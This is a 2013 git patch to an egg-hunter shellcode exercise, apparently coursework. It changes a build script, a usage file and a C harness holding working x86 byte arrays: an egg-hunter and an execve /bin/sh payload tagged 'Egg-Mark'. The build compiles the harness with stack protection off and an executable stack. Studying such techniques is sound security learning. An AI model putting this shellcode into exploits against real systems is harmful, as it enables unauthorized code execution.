From 7a26aee78477e0d7b5e95acbe963b8ec78b96844 Mon Sep 17 00:00:00 2001 From: arno01 Date: Wed, 27 Mar 2013 16:47:23 +0100 Subject: [PATCH] minor updates --- exam3/USAGE | 16 +++++++--------- exam3/egg.nasm | 32 -------------------------------- exam3/make.sh | 14 ++++---------- exam3/shellcode.c | 2 +- 4 files changed, 12 insertions(+), 52 deletions(-) delete mode 100644 exam3/egg.nasm diff --git a/exam3/USAGE b/exam3/USAGE index e78563b..54d3692 100644 --- a/exam3/USAGE +++ b/exam3/USAGE @@ -9,25 +9,23 @@ exam3$ ln -svf payload-execve-stack.nasm payload.nasm 2. Compile the shellcode with a custom "egg" (must be 8 bytes in length) -exam3$ ./make.sh "cust.egg" - [I] Using custom EGG mark: cust.egg +exam3$ ./make.sh + [I] Argument not specified. Using default EGG mark. [+] Compiling payload.nasm ... - [+] Compiling egg.nasm ... [+] Compiling hunter.nasm ... - [+] Extracting EGG code from egg ... [+] Extracting PAYLOAD code from payload ... + [+] Adding EGG mark to PAYLOAD ... [+] Checking PAYLOAD code for NULLs ... [+] Extracting HUNTER code from hunter ... [+] Checking HUNTER code for NULLs ... [+] Compiling shellcode.c ... --rwx------. 1 arno arno 5108 Mar 27 15:00 ./shellcode +-rwx------. 1 arno arno 5100 Mar 27 16:46 ./shellcode [+] All done! - 3. Run the shellcode exam3$ ./shellcode -Hunter Length: 37 -Payload Length: 43 -sh-4.1$ +Hunter Length: 29 +Payload Length: 36 +sh-4.1$ exit diff --git a/exam3/egg.nasm b/exam3/egg.nasm deleted file mode 100644 index 1de4fa9..0000000 --- a/exam3/egg.nasm +++ /dev/null @@ -1,32 +0,0 @@ -; This program is free software: you can redistribute it and/or modify -; it under the terms of the GNU General Public License as published by -; the Free Software Foundation, either version 3 of the License, or -; (at your option) any later version. -; -; This program is distributed in the hope that it will be useful, -; but WITHOUT ANY WARRANTY; without even the implied warranty of -; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -; GNU General Public License for more details. -; -; You should have received a copy of the GNU General Public License -; along with this program. If not, see . -; -; -; Filename: egg.nasm -; Author: Andrey Arapov -; 2013 March -; -; - -section .text -global _start - -_start: - ;db "Egg-Mark" ; QWORD egg marker - will be appended in shellcode.c after running 'make.sh' - - ; loop counter = 8 - xor ecx, ecx - mov cl, 8 -decloop: - dec eax - loop decloop diff --git a/exam3/make.sh b/exam3/make.sh index 96d7355..00c5f73 100755 --- a/exam3/make.sh +++ b/exam3/make.sh @@ -32,27 +32,21 @@ NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g')) EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g') # Cleanup -rm -f shellcode payload.o payload egg.o egg hunter.o hunter +rm -f shellcode payload.o payload hunter.o hunter echo " [+] Compiling payload.nasm ..." nasm -f elf32 -o payload.o payload.nasm ld -m elf_i386 -o payload payload.o -echo " [+] Compiling egg.nasm ..." -nasm -f elf32 -o egg.o egg.nasm -ld -m elf_i386 -o egg egg.o - echo " [+] Compiling hunter.nasm ..." nasm -f elf32 -o hunter.o hunter.nasm ld -m elf_i386 -o hunter hunter.o -echo " [+] Extracting EGG code from egg ..." -EGGCODE=$(objdump -d ./egg |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s) - echo " [+] Extracting PAYLOAD code from payload ..." PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s) -FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${EGGCODE}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g') +echo " [+] Adding EGG mark to PAYLOAD ..." +FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g') echo " [+] Checking PAYLOAD code for NULLs ..." if [[ $FULL_PAYLOADCODE == *00* ]]; then @@ -129,7 +123,7 @@ echo " [+] Compiling shellcode.c ..." gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode # Cleanup -rm -f payload.o payload egg.o egg hunter.o hunter +rm -f payload.o payload hunter.o hunter ls -la ./shellcode diff --git a/exam3/shellcode.c b/exam3/shellcode.c index 376ae30..3a66c9f 100644 --- a/exam3/shellcode.c +++ b/exam3/shellcode.c @@ -5,7 +5,7 @@ unsigned char hunter[] = "\xeb\x16\x58\x40\x81\x78\xf8\x45\x67\x67\x2d\x75\xf6\x unsigned char garbage1[] = "Just some garbage here..."; -unsigned char payload[] = "\x45\x67\x67\x2d\x4d\x61\x72\x6b\x31\xc9\xb1\x08\x48\xe2\xfd\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80"; +unsigned char payload[] = "\x45\x67\x67\x2d\x4d\x61\x72\x6b\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80"; unsigned char garbage2[] = "And some garbage there...";